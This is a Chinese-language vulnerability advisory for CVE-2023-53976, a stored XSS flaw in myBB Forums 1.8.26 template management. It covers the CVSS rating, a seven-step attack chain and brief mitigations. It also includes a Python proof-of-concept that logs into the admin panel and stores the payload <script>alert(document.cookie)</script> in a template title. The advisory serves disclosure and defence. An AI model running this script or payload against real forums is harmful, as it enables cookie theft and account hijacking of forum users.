CVE-2023-53976 myBB Forums模板管理存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2023-53976

漏洞类型

存储型XSS（跨站脚本攻击）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

myBB Forums 1.8.26

漏洞概述

CVE-2023-53976是myBB Forums 1.8.26版本中存在的存储型跨站脚本（Stored XSS）漏洞。该漏洞位于论坛的模板管理系统中，允许已认证的管理员用户在创建新模板时注入恶意JavaScript脚本代码。由于漏洞属于存储型，当其他用户访问或查看包含恶意代码的模板页面时，攻击者植入的脚本将自动执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全风险。漏洞的利用需要攻击者具备管理员权限，并通过后台管理界面的模板管理功能进行操作。虽然CVSS评分为5.4（中危），但存储型XSS漏洞在实际攻击中可能被用于横向移动和权限提升，因此需要及时修复。

技术细节

该漏洞源于myBB Forums 1.8.26的模板管理模块对用户输入缺乏充分的输入验证和输出编码。攻击者（具备管理员权限）可通过以下路径利用此漏洞：访问管理后台的'Templates and Style' > 'Templates' > 'Manage Templates' > 'Global Templates'界面，在创建新模板时，于模板标题字段（template title field）中插入恶意JavaScript脚本代码，如<script>alert(document.cookie)</script>等。由于系统未对模板标题进行适当的HTML转义处理，恶意代码被直接存储到数据库中。当论坛其他用户访问相关页面或触发模板渲染时，存储的恶意脚本会被浏览器作为合法脚本执行，从而实现XSS攻击。攻击者可利用此漏洞窃取用户会话Cookie、伪造用户操作或进行进一步的攻击。

攻击链分析

STEP 1

步骤1

攻击者获取myBB Forums管理员账户凭据

STEP 2

步骤2

攻击者登录管理后台，导航至'Templates and Style' > 'Templates' > 'Manage Templates'

STEP 3

步骤3

进入'Global Templates'界面，选择创建新模板

STEP 4

步骤4

在模板标题字段中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>

STEP 5

步骤5

提交表单，恶意脚本被存储到数据库中

STEP 6

步骤6

当其他用户访问包含该模板的页面时，恶意脚本在用户浏览器中执行

STEP 7

步骤7

攻击者通过XSS窃取用户会话Cookie、劫持账户或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2023-53976 PoC - myBB Forums Stored XSS via Template Management
# Target: myBB Forums <= 1.8.26
# Attack Vector: Authenticated admin creates malicious template

import requests
import re

TARGET_URL = "http://target-forum.com"
ADMIN_PATH = "/admin/index.php"
USERNAME = "admin"
PASSWORD = "admin_password"

session = requests.Session()

# Step 1: Admin login
login_data = {
    "username": USERNAME,
    "password": PASSWORD,
    "do": "login"
}
login_response = session.post(f"{TARGET_URL}{ADMIN_PATH}", data=login_data)

# Step 2: Navigate to template management
# Templates and Style > Templates > Manage Templates > Global Templates
template_url = f"{TARGET_URL}{ADMIN_PATH}?module=style-templates"

# Step 3: Create new template with XSS payload in title field
malicious_payload = '<script>alert(document.cookie)</script>'
new_template_data = {
    "action": "do_add",
    "title": malicious_payload,  # XSS payload in template title
    "template": "<p>Malicious template content</p>",
    "sid": "-1"  # Global template
}

create_response = session.post(template_url, data=new_template_data)

# Step 4: Verify XSS is stored and executed when template is viewed
# Any user viewing the template will trigger the JavaScript payload
print(f"XSS payload sent: {malicious_payload}")
print(f"Response status: {create_response.status_code}")

影响范围

myBB Forums 1.8.26及之前版本

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1)限制管理员账户数量并使用强密码；2)启用双因素认证保护管理后台；3)在Web应用防火墙(WAF)中配置XSS防护规则；4)临时禁用非必要的管理员创建模板功能；5)监控管理后台的异常操作日志。